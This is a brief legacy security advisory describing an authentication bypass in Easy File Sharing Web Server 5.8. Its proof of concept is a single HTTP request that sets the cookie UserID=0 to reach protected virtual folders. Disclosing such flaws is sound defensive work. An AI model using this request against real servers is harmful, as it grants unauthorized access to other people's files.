Home
Consulting
Advisories
Software
Articles
Contact

Easy File Sharing Web Server Version 5.8 Authentication Bypass

Legacy Advisories

Description

If the UserID cookie is set all virtual folders become accessible.

Proof Of Concept

GET http://localhost/[Virtual Folder] HTTP/1.1
Host: localhost
Cookie: UserID=0



Copyright © 2018 AutoSec Tools LLC